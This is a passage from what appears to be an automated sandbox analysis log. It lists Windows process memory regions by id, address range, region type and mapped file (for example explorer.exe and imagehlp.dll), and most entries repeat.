0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1965 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1966 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1967 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1968 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1969 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1970 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1971 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1972 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1973 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1974 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1975 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1976 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1977 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1978 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1979 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1980 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1981 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1982 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1983 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1984 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1985 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1986 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1987 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1988 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1989 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1990 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1991 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1992 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1993 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1994 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1995 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1996 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1997 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1998 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1999 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2000 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2001 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2002 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2003 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2004 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2005 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2006 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2007 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2008 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2009 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2010 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2011 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2012 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2013 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2014 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2015 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2016 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2017 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2018 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2019 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2020 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2021 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2022 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2023 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2024 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2025 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2026 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2027 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2028 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2029 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2030 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2031 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2032 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2033 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2034 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2035 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2036 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2037 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2038 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2039 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2040 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2041 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2042 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2043 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2044 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2045 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2046 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2047 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2048 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2049 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2050 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 2051 start_va = 0x3a10000 end_va = 0x3a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 2052 start_va = 0x3a30000 end_va = 0x3a3dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a30000" filename = "" Region: id = 2053 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2054 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2055 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2056 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2057 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2058 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2059 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2060 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2061 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2062 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2063 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2064 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2065 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2066 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2067 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2068 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2069 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2070 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2071 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2072 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2073 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2074 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2075 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2076 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2077 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2078 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2079 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2080 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2081 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2082 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2083 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2084 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2085 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2086 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2087 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2088 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2089 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2090 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2091 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2092 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2093 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2094 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2095 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2096 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2097 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2098 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2099 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2100 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2101 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2102 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2103 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2104 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2105 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2106 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2107 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2108 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2109 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 2110 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 2111 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 2112 start_va = 0x9bc0000 end_va = 0x9e7dfff monitored = 0 entry_point = 0x9beb790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2113 start_va = 0x9a00000 end_va = 0x9a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a00000" filename = "" Region: id = 2114 start_va = 0x9b40000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b40000" filename = "" Region: id = 2115 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 2116 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 2117 start_va = 0x9bc0000 end_va = 0x9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 2118 start_va = 0x9e30000 end_va = 0xa0edfff monitored = 0 entry_point = 0x9e5b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2119 start_va = 0x2150000 end_va = 0x215dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 2120 start_va = 0x2580000 end_va = 0x2580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2121 start_va = 0x2590000 end_va = 0x2689fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2122 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 2123 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2124 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2125 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2126 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2127 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2128 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2129 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2130 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2131 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2132 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2133 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2134 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2135 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2136 start_va = 0x2580000 end_va = 0x2580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2137 start_va = 0x2590000 end_va = 0x2689fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2138 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2139 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2140 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2141 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2144 start_va 